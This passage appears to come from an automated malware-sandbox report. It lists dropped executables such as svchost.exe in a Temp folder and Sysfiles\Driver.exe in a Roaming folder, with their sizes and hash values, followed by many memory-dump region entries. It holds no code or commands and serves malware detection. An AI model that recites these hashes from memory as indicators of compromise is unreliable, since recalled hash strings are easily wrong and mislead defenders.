                                                                                                                                                            MD5

                                                                                                                                                            8677376c509f0c66d1f02c6b66d7ef90

                                                                                                                                                            SHA1

                                                                                                                                                            e057eddf9d2e319967e200a5801e4bbe6e45862a

                                                                                                                                                            SHA256

                                                                                                                                                            f7afac39d2754ac953bf129ee094c8b092e349cdf35f1ba23c2c76a0229f9e96

                                                                                                                                                            SHA512

                                                                                                                                                            e0c685e289c10a48b5fa251aa4414653c103dac69faf536b9ae9598e066aab5a03b03c09096c42a0f244aeaf80f2b9e4aa28d6b28da436587a3f52a9155473d0

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\svchost.exe

                                                                                                                                                            Filesize

                                                                                                                                                            444KB

                                                                                                                                                            MD5

                                                                                                                                                            39d865aa4171442b417c40479e63a03f

                                                                                                                                                            SHA1

                                                                                                                                                            0da788f33274472b1b2217a31301eddd95c7e77c

                                                                                                                                                            SHA256

                                                                                                                                                            0e4db144b872080e865f2ce5d7dc2edeb47eb304d109c3f16c82c04ce626644f

                                                                                                                                                            SHA512

                                                                                                                                                            619e5585a51dd03bddef2a67e7bbce0742266750548004a4c664715d5a217fd9477de22c91218b39a6c5d957ec1f4fb3a6743ebf9ad86814632e55750cd4ca82

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\taskweaker.exe

                                                                                                                                                            Filesize

                                                                                                                                                            5.8MB

                                                                                                                                                            MD5

                                                                                                                                                            6c149b39619395a8ba117a4cae95ba6f

                                                                                                                                                            SHA1

                                                                                                                                                            3ef8be98589745ecce5522dd871e813f69a7b71b

                                                                                                                                                            SHA256

                                                                                                                                                            c43b64c78f6ccba5cfb7de13fc39d5cc43fad9a9f5e78799b34100ab69e5e4e8

                                                                                                                                                            SHA512

                                                                                                                                                            866edae7858e7bfb82486e99b31550307de81fa732a3075b6e2ff0abcade5331be28bb14d894cdf5176dc907a45aaa1407b6d8c4295cc69b6d45516f319560a4

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\version.txt

                                                                                                                                                            Filesize

                                                                                                                                                            1B

                                                                                                                                                            MD5

                                                                                                                                                            c81e728d9d4c2f636f067f89cc14862c

                                                                                                                                                            SHA1

                                                                                                                                                            da4b9237bacccdf19c0760cab7aec4a8359010b0

                                                                                                                                                            SHA256

                                                                                                                                                            d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35

                                                                                                                                                            SHA512

                                                                                                                                                            40b244112641dd78dd4f93b6c9190dd46e0099194d5a44257b7efad6ef9ff4683da1eda0244448cb343aa688f5d3efd7314dafe580ac0bcbf115aeca9e8dc114

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\setup-1fbfaf8ef9c1de1d\setup.exe

                                                                                                                                                            Filesize

                                                                                                                                                            41.6MB

                                                                                                                                                            MD5

                                                                                                                                                            312c3e03890f7d5242fe2158acabd4e8

                                                                                                                                                            SHA1

                                                                                                                                                            d148cf18f876b55c03f2718bfff321b7d6287f87

                                                                                                                                                            SHA256

                                                                                                                                                            6ac290f077cd4228dff7dc37a4c37e0a675207ad345543e8cd01008ce67ea751

                                                                                                                                                            SHA512

                                                                                                                                                            da0e5c199a7ab586a17dd7b74cc4b6727ac5c9efcb3397b45f8806a6418c20bfc7515804ca10e2a9c52b207b56f3a56c86e3c3be646ffe27f988c59b0bc66971

                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\1000001000\uYtF.exe

                                                                                                                                                            Filesize

                                                                                                                                                            2.5MB

                                                                                                                                                            MD5

                                                                                                                                                            4691a9fe21f8589b793ea16f0d1749f1

                                                                                                                                                            SHA1

                                                                                                                                                            5c297f97142b7dad1c2d0c6223346bf7bcf2ea82

                                                                                                                                                            SHA256

                                                                                                                                                            63733ff3b794ebd7566103c8a37f7de862348ffacf130661f2c544dea8cde904

                                                                                                                                                            SHA512

                                                                                                                                                            ee27d5912e2fb4b045ffd39689162ab2668a79615b2b641a17b6b03c4273070a711f9f29dd847ffff5ae437d9df6102df6e10e898c36d44ec25e64ba1dd83386

                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

                                                                                                                                                            Filesize

                                                                                                                                                            3.9MB

                                                                                                                                                            MD5

                                                                                                                                                            02569a7a91a71133d4a1023bf32aa6f4

                                                                                                                                                            SHA1

                                                                                                                                                            0f16bcb3f3f085d3d3be912195558e9f9680d574

                                                                                                                                                            SHA256

                                                                                                                                                            8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

                                                                                                                                                            SHA512

                                                                                                                                                            534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

                                                                                                                                                          • memory/612-3-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            9.9MB

                                                                                                                                                          • memory/612-0-0x00007FFA76483000-0x00007FFA76484000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/612-1-0x0000000000A20000-0x0000000000A28000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            32KB

                                                                                                                                                          • memory/612-2-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            9.9MB

                                                                                                                                                          • memory/668-186-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            8.3MB

                                                                                                                                                          • memory/668-95-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            8.3MB

                                                                                                                                                          • memory/668-92-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            8.3MB

                                                                                                                                                          • memory/668-90-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            8.3MB

                                                                                                                                                          • memory/668-89-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            8.3MB

                                                                                                                                                          • memory/668-96-0x00000000012E0000-0x0000000001300000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            128KB

                                                                                                                                                          • memory/668-97-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            8.3MB

                                                                                                                                                          • memory/668-91-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            8.3MB

                                                                                                                                                          • memory/668-93-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            8.3MB

                                                                                                                                                          • memory/668-94-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            8.3MB

                                                                                                                                                          • memory/668-103-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            8.3MB

                                                                                                                                                          • memory/668-100-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            8.3MB

                                                                                                                                                          • memory/668-99-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            8.3MB

                                                                                                                                                          • memory/668-98-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            8.3MB

                                                                                                                                                          • memory/888-181-0x0000000000400000-0x0000000000863000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4.4MB

                                                                                                                                                          • memory/1072-304-0x00000000046F0000-0x0000000004726000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            216KB

                                                                                                                                                          • memory/1072-403-0x000000000A1F0000-0x000000000A868000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            6.5MB

                                                                                                                                                          • memory/1072-395-0x0000000009050000-0x00000000090E4000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            592KB

                                                                                                                                                          • memory/1072-396-0x0000000008D70000-0x0000000008D8A000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            104KB

                                                                                                                                                          • memory/1072-397-0x0000000008DC0000-0x0000000008DE2000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            136KB

                                                                                                                                                          • memory/1072-340-0x0000000008030000-0x00000000080A6000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            472KB

                                                                                                                                                          • memory/1072-333-0x0000000007780000-0x000000000779C000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            112KB

                                                                                                                                                          • memory/1072-321-0x00000000077B0000-0x0000000007816000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            408KB

                                                                                                                                                          • memory/1072-323-0x0000000007890000-0x0000000007BE0000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            3.3MB

                                                                                                                                                          • memory/1072-320-0x0000000007710000-0x0000000007732000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            136KB

                                                                                                                                                          • memory/1072-305-0x0000000006FB0000-0x00000000075D8000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            6.2MB

                                                                                                                                                          • memory/1144-67-0x00000000059C0000-0x00000000059FE000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            248KB

                                                                                                                                                          • memory/1144-284-0x0000000007470000-0x0000000007632000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            1.8MB

                                                                                                                                                          • memory/1144-53-0x0000000000E60000-0x0000000000EB0000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            320KB

                                                                                                                                                          • memory/1144-54-0x0000000005CE0000-0x00000000061DE000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            5.0MB

                                                                                                                                                          • memory/1144-130-0x0000000006F90000-0x0000000006FE0000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            320KB

                                                                                                                                                          • memory/1144-71-0x0000000005B60000-0x0000000005BAB000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            300KB

                                                                                                                                                          • memory/1144-66-0x0000000005960000-0x0000000005972000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            72KB

                                                                                                                                                          • memory/1144-57-0x00000000056F0000-0x0000000005782000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            584KB

                                                                                                                                                          • memory/1144-129-0x00000000062E0000-0x0000000006346000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            408KB

                                                                                                                                                          • memory/1144-65-0x0000000005A50000-0x0000000005B5A000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            1.0MB

                                                                                                                                                          • memory/1144-286-0x0000000008380000-0x00000000088AC000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            5.2MB

                                                                                                                                                          • memory/1144-62-0x00000000067F0000-0x0000000006DF6000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            6.0MB

                                                                                                                                                          • memory/1144-61-0x00000000057A0000-0x00000000057AA000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            40KB

                                                                                                                                                          • memory/1732-221-0x0000000000400000-0x0000000000863000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4.4MB

                                                                                                                                                          • memory/1732-175-0x0000000010000000-0x0000000010362000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            3.4MB

                                                                                                                                                          • memory/1732-176-0x0000000010000000-0x0000000010362000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            3.4MB

                                                                                                                                                          • memory/1732-172-0x0000000010000000-0x0000000010362000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            3.4MB

                                                                                                                                                          • memory/1824-419-0x0000000000400000-0x0000000000983000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            5.5MB

                                                                                                                                                          • memory/1824-225-0x0000000000400000-0x0000000000983000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            5.5MB

                                                                                                                                                          • memory/1824-224-0x0000000000400000-0x0000000000983000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            5.5MB

                                                                                                                                                          • memory/1824-226-0x0000000000400000-0x0000000000983000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            5.5MB

                                                                                                                                                          • memory/2424-198-0x000000006C090000-0x000000006C0CA000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            232KB

                                                                                                                                                          • memory/2424-196-0x0000000010000000-0x0000000010362000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            3.4MB

                                                                                                                                                          • memory/2424-195-0x0000000010000000-0x0000000010362000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            3.4MB

                                                                                                                                                          • memory/2424-194-0x0000000010000000-0x0000000010362000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            3.4MB

                                                                                                                                                          • memory/2424-223-0x0000000000400000-0x0000000000863000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4.4MB

                                                                                                                                                          • memory/2568-124-0x0000000000E00000-0x00000000011FE000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4.0MB

                                                                                                                                                          • memory/2644-414-0x00007FF783B70000-0x00007FF7841A6000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            6.2MB

                                                                                                                                                          • memory/3008-421-0x0000000140000000-0x0000000140B75000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            11.5MB

                                                                                                                                                          • memory/3008-220-0x0000000140000000-0x0000000140B75000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            11.5MB

                                                                                                                                                          • memory/3008-43839-0x0000000140000000-0x0000000140B75000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            11.5MB

                                                                                                                                                          • memory/3008-781442-0x0000000140000000-0x0000000140B75000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            11.5MB

                                                                                                                                                          • memory/3008-149-0x0000000140000000-0x0000000140B75000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            11.5MB

                                                                                                                                                          • memory/3008-156-0x00000000001D0000-0x00000000001E4000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            80KB

                                                                                                                                                          • memory/3008-411-0x0000000140000000-0x0000000140B75000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            11.5MB

                                                                                                                                                          • memory/3720-285-0x0000019321490000-0x00000193214B2000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            136KB

                                                                                                                                                          • memory/3720-309-0x0000019321640000-0x00000193216B6000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            472KB

                                                                                                                                                          • memory/4192-141-0x0000000010000000-0x0000000010362000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            3.4MB

                                                                                                                                                          • memory/4192-161-0x0000000000400000-0x0000000000863000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4.4MB

                                                                                                                                                          • memory/4192-145-0x0000000010000000-0x0000000010362000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            3.4MB

                                                                                                                                                          • memory/4192-144-0x0000000010000000-0x0000000010362000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            3.4MB

                                                                                                                                                          • memory/4464-420-0x0000000000400000-0x0000000000443000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            268KB

                                                                                                                                                          • memory/4684-197-0x00007FF6CDC40000-0x00007FF6CE276000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            6.2MB

                                                                                                                                                          • memory/4684-146-0x00007FF6CDC40000-0x00007FF6CE276000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            6.2MB

                                                                                                                                                          • memory/4684-201-0x00007FF6CDC40000-0x00007FF6CE276000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            6.2MB

                                                                                                                                                          • memory/4756-147-0x00007FF6810A0000-0x00007FF6810C4000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            144KB

                                                                                                                                                          • memory/5044-200-0x00000000027A0000-0x00000000027F6000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            344KB

                                                                                                                                                          • memory/5044-199-0x00000000027A0000-0x00000000027F6000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            344KB

                                                                                                                                                          • memory/6256-24951-0x00000227AAC10000-0x00000227AACC9000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            740KB

                                                                                                                                                          • memory/6256-24945-0x0000022792390000-0x00000227923AC000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            112KB

                                                                                                                                                          • memory/6256-24991-0x00000227923B0000-0x00000227923BA000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            40KB